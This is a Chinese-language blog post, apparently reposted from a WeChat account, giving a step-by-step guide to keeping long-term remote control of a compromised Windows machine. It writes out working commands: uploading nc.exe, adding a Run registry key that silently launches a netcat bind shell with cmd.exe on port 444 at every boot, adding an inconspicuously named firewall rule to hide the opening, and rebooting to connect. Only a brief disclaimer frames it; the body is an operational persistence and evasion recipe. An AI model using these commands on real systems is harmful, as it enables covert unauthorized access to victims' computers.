注册表生成永久后门

admin 2024年3月9日22:30:59评论32 views1字数 1244阅读4分8秒阅读模式

#############################

免责声明:本文仅作收藏学习之用,亦希望大家以遵守《网络安全法》相关法律为前提学习,切勿用于非法犯罪活动,对于恶意使用造成的损失,和本人及作者无关。

##############################

1.先通过永恒之蓝或者发送一个恶意程序,拿到用户的权限,然后开始对其进行新建注册表留下后门,来达到长期的进行远控。

这里我是通过向用户端发送了一个恶意程序,用户执行之后,这里获取到了用户的shell

注册表生成永久后门

2.然后这里上传一个nc.exe的恶意程序,放在隐秘的目录下面。可以先看一下kali里面的nc.exe执行程序放在哪个文件夹下的。

注册表生成永久后门

3.开始向用户端上传nc

注册表生成永久后门

4.预向HKLM\software\microsoft\windows\currentversion\run这个组册表中里面执行一个组件,这里我们通过reg enumkey -k HKLM\software\microsoft\windows\currentversion\run查看当前有哪些字符串

注册表生成永久后门

5.然后我们开始创建一个新的项,来使得只要开机就可以运行我们这个nc程序。

reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:windowssystem32nc.exe -Ldp 444 -e cmd.exe'

-L:如果有人过来链接会把自己的shell给他,如果别人断开了,依然会持续侦听,不会因为一次断开,就不再监听了。

-d:就是静默执行,通过隐形模式在后台执行,而不容易被发现,防止露馅了。

注册表生成永久后门

6.我们在利用reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc命令查看一下这个项建立的情况。

注册表生成永久后门

注册表生成永久后门

7.此时我们的注册表已经建立完成,正常就是可以远控了,但是用户一般会开启防火墙,所以我们需要关闭防火墙,但是关闭防火墙太明显了,会被发现。所以我们在防火墙里面建立一个规则,只方通444端口。

首先我们执行execute -f cmd -i -H 打开用户端的cmd

注册表生成永久后门

8.然后我们通过命令:netsh firewall show opmode查看他的防火墙状态,发现是打开的。

注册表生成永久后门

9.执行命令:netsh firewall add portopening TCP 444 "test" ENABLE ALL建立一个入站的规则,名称是test,这里为了做到更好的隐蔽可以起一个更隐蔽的名字。

注册表生成永久后门

10.此时我们可先来到用户端防火墙上面的高级防火墙看一下

注册表生成永久后门

11.接下来就是让PC重启就可,重启之后前面的注册表就回默认生效。

命令:shutdown -r -t 0

注册表生成永久后门

12.等待开启我们直接nc 172.16.0.59 444 就可以轻松的拿到用户的shell,而且后面会长时间存在。

注册表生成永久后门

13最后我们可以用autoruns工具查看一下我们的建立的组册表。

注册表生成永久后门

原文始发于微信公众号(菜鸟小新):注册表生成永久后门

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月9日22:30:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   注册表生成永久后门https://cn-sec.com/archives/2558646.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息